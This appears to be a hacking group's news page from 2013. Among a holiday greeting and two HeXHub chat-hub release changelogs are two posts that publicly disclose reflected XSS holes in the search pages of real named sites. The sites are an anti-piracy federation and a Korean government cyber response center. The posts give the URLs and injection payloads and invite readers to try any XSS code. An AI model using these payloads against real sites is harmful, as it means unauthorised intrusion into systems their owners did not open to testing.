Merry Christmas & Happy New Year!

At the close of another year, we gratefully take time to wish you and your family a happy holiday season and prosperous new year.

Team Elite

Posted by Neo on 2013-12-24 17:47 ⋅ 2 comments ⋅ 1 like

Federation Against Software Theft - XSS

Vulnerable page: http://www.fastiis.org/search/

PoC:

Code

"><h1>XSS found by Team Elite</h1>

Code

"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in search box to reproduce the bug.

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.

Posted by Neo on 2013-12-22 11:31 ⋅ 0 comments ⋅ 0 likes

Cyber Terror Response Center (Netan) - XSS

Vulnerable page: http://www.ctrc.go.kr/eng/search/search.jsp

PoC:

Code

"><h1>XSS found by Team Elite</h1>

Code

"><img src=http://te-home.net/images/logo.png>

You can include any XSS code in search box to reproduce the bug.

Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.

Posted by Neo on 2013-12-19 23:19 ⋅ 0 comments ⋅ 0 likes

HeXHub 5.10b

Changes in 5.10b

- corrected: the hub did not close the connection after verifying the referrer (thanks to RoLex for reporting this error)
- all users who have the spam1 right, LAN users, users who have a localhost IP or hub's IP can send any referrer
- hubs that have a LAN or a localhost IP no longer verify referrers

File information: HeXHub 5.10b

Posted by hexhub on 2013-12-17 18:01 ⋅ 0 comments ⋅ 0 likes

HeXHub 5.10a

Changes in 5.10a

- corrected: user's IP was not checked when receiving the referrer (thanks to RoLex for reporting this error)

File information: HeXHub 5.10a

Posted by hexhub on 2013-12-16 21:47 ⋅ 0 comments ⋅ 0 likes